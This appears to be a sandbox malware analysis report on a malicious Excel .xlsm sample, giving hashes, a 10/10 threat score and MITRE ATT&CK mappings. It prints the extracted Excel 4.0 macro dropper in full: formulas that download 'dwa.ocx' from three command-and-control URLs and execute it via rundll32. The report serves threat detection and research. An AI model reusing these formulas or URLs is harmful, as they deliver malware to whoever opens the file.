Overview

overview

10

Static

static

10

?i=1awpumfgz.xlsm

windows7_x64

10

?i=1awpumfgz.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ?i=1awpumfgz

  • Size

    83KB

  • Sample

    220522-f566dsbbgr

  • MD5

    c70893d52dce1a97f5cabbcd042d286c

  • SHA1

    521a0ff74064ea610ca112d166319f55d792b667

  • SHA256

    37bb74fcd5b1ff6bbd323163e21277b3ed80d124cc4d727f4ec64d1048a2c85e

  • SHA512

    507a95d0f831f221e44f9a0c162490fa836cd21d5ee11522b661c198a4c4a295b74960bd3cf43bfda7815e6eee88111b7be5a0a63a1bf14339648a540571e203

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://digitalcardsbychivami.xyz/includes/KrPj/

http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/

http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://digitalcardsbychivami.xyz/includes/KrPj/","..\dwa.ocx",0,0) =IF('RHEEHGF'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\dwa.ocx,D""&""l""&""lR""&""egister""&""Server") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://digitalcardsbychivami.xyz/includes/KrPj/
xlm40.dropper

http://demo.avionxpress.com/assets/XqQrGSKq8TrVj/
xlm40.dropper

http://swipermachinereview.xyz/wp-includes/t3Ow4KF0p0Q8oo/

Targets

    • Target

      ?i=1awpumfgz

    • Size

      83KB

    • MD5

      c70893d52dce1a97f5cabbcd042d286c

    • SHA1

      521a0ff74064ea610ca112d166319f55d792b667

    • SHA256

      37bb74fcd5b1ff6bbd323163e21277b3ed80d124cc4d727f4ec64d1048a2c85e

    • SHA512

      507a95d0f831f221e44f9a0c162490fa836cd21d5ee11522b661c198a4c4a295b74960bd3cf43bfda7815e6eee88111b7be5a0a63a1bf14339648a540571e203

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks